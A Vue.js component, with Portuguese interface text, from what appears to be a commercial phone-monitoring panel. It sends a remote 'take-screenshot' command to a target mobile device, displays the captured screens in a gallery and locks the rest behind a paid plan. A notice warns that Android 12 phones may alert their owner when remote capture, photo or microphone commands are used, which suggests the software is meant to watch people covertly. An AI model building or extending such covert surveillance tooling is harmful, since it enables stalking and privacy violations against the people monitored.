<template>
  <div class="vx-row">
    <div class="container" v-show="photoLoading">
      <div id="loading" class="vs-con-loading__container"></div>
    </div>
    <div class="vx-col mb-base w-full" v-show="!photoLoading">
      <div class="vx-row">
        <div class="vx-col w-full lg:w-1/4 mb-base">
          <div class="btn-group">
            <vs-button
              class="vs-button-warning vs-button-relief"
              @click="runCommand('take-screenshot')"
              :disabled="processing"
            >
              <i class="far fa-camera text-lg"></i> {{$t("TakeScreenshot")}}
            </vs-button>
          </div>
        </div>
        <div class="vx-col w-full lg:w-3/4 mb-base">
          <div class="con-vs-alert con-vs-alert-primary">
            <div class="vs-alert text-center">
              * Aguarde o recebimento de uma captura para só em seguida acionar o comando novamente.
              <br />Aparelhos que estão na versão 12 do Android, podem ser notificados quando ocorre a utilização de comandos remotos, como Captura, Foto e Microfone.
            </div>
          </div>
        </div>
      </div>

      <div class="vx-card">
        <vx-card title="Telas Capturadas" v-viewer>
          <div class="vx-row pt-2">
            <div class="flex justify-center vx-col w-full mb-6">
              <vs-col vs-type="flex" vs-justify="center" vs-align="center" vs-w="6" vs-xs="12">
                <div class="con-vs-pagination vs-pagination-primary" v-show="meta.pagination.total_pages > 1">
                  <vs-pagination :total="meta.pagination.total_pages" v-model="page" :max="5"></vs-pagination>
                </div>
              </vs-col>
            </div>
            <div v-show="!data.length" class="text-center pt-5 container">
              <p class="text-grey">Nenhum item encontrado no período selecionado</p>
            </div>
            <div class="vx-col w-1/2 sm:w-4/12 text-center mt-2 mb-4" v-for="(img, index) in data" :key="index">
              <img :src="img.path" :alt="img.date | formatDateTime" class="rounded mb-4 user-latest-image responsive" />
              <div>{{ img.date | formatDateTime }}</div>
            </div>

            <div class="flex justify-center vx-col w-full mb-6">
              <vs-col vs-type="flex" vs-justify="center" vs-align="center" vs-w="6" vs-xs="12">
                <div class="con-vs-pagination vs-pagination-primary" v-show="meta.pagination.total_pages > 1">
                  <vs-pagination :total="meta.pagination.total_pages" v-model="page"></vs-pagination>
                </div>
              </vs-col>
            </div>
          </div>
        </vx-card>

        <div v-show="dispositivo.uid && dispositivo.licence.until === null" class="w-full">
          <div class="vx-col w-full h-full prc-2 mb-base">
            <vx-card slot="no-body" class="text-center h-full bg-primary-gradient greet-user">
              <feather-icon
                icon="AwardIcon"
                class="p-6 mb-8 bg-primary inline-flex rounded-full text-white shadow"
                svgClasses="h-8 w-8"
              ></feather-icon>
              <h1 class="mb-6 text-white">Aviso Importante</h1>
              <p class="xl:w-3/4 lg:w-4/5 md:w-2/3 w-4/5 mx-auto text-white">
                O restante do conteúdo foi bloqueado por sua conta estar na
                <strong>Versão Gratuita</strong> desbloqueie o conteúdo agora mesmo.
              </p>
              <br />
              <router-link :to="`/planos/mobile/${dispositivo.uid}/1`">
                <vs-button color="warning" type="relief">
                  <vs-icon icon-pack="fas" icon="fa-shopping-cart"></vs-icon>&nbsp;Liberar Conteúdo Completo
                </vs-button>
              </router-link>
            </vx-card>
          </div>
        </div>
      </div>
    </div>
  </div>
</template>

<script>
export default {
  data() {
    return {
      processing: false,
      data: [],
      photoLoading: true,
      dispositivo: {
        licence: {
          until: null,
        },
      },
      meta: {
        pagination: {
          total_pages: 0,
        },
      },
      page: 1,
      dateFilterId: 5,
      dateFilterText: 'Todos os Registros',
    };
  },

  watch: {
    page: function () {
      this.load();
    },
  },

  mounted() {
    this.load();

    this.$vs.loading({
      container: '#loading',
      type: 'default',
      scale: 1,
    });
  },

  methods: {
    runCommand: function (command) {
      this.processing = true;

      setTimeout(() => {
        this.load();
        this.processing = false;
      }, 20000);

      const mobile = JSON.parse(this.$localStorage.get('mobile'));

      this.$api
      .get(`/api/v${mobile.panel_version}/mobile/command/${mobile.uid}/${command}`)
      .then(() => {
        this.$vs.notify({
          title: 'Informação',
          text:
            'Comando enviado. Assim que o dispositivo estiver online, a captura será feita ou em até 1 minuto se ele estiver online agora.',
          color: 'success',
        });

        setTimeout(() => {
          this.load();
        }, 30000);

        setTimeout(() => {
          this.load();
        }, 60000);
      })
      .catch((error) => {
        this.$vs.notify({
          time: 6000,
          title: 'Aviso',
          text: error.response.data.message,
          iconPack: 'feather',
          icon: 'icon-alert-circle',
          color: 'danger',
        });
      });
    },
    load: function () {
      const mobile = JSON.parse(this.$localStorage.get('mobile'));
      this.$api
      .get(
        `/api/v${mobile.panel_version}/mobile/screenshot/${mobile.uid}?page=${this.page}&dateFilterId=${this.dateFilterId}`
      )
      .then((response) => {
        this.photoLoading = false;
        this.data = response.data.data;
        this.meta = response.data.meta || { pagination: { total_pages: 0 } };
      });

      this.$api.get(`/api/v${mobile.panel_version}/mobile/device/${mobile.uid}`).then((response) => {
        this.dispositivo = response.data.data;
        this.$EventBus.$emit('deviceChanged', this.dispositivo);
      });
    },
    setDateFilter: function (filterId) {
      this.dateFilterId = filterId;
      this.load();

      switch (this.dateFilterId) {
        case 0:
          this.dateFilterText = 'Hoje';
          break;
        case 1:
          this.dateFilterText = 'Ontem';
          break;
        case 2:
          this.dateFilterText = 'Últimos 7 dias';
          break;
        case 3:
          this.dateFilterText = 'Últimos 30 dias';
          break;
        case 4:
          this.dateFilterText = 'Últimos 90 dias';
          break;
        case 5:
          this.dateFilterText = 'Todos os Registros';
          break;
      }
    },
  },
};
</script>
<style>
.viewer-button {
  top: 20px;
  z-index: 10000000;
}
#loading {
  width: 100px;
  height: 100px;
  margin: auto;
  display: flex;
  justify-content: center;
  align-items: center;
}
</style>
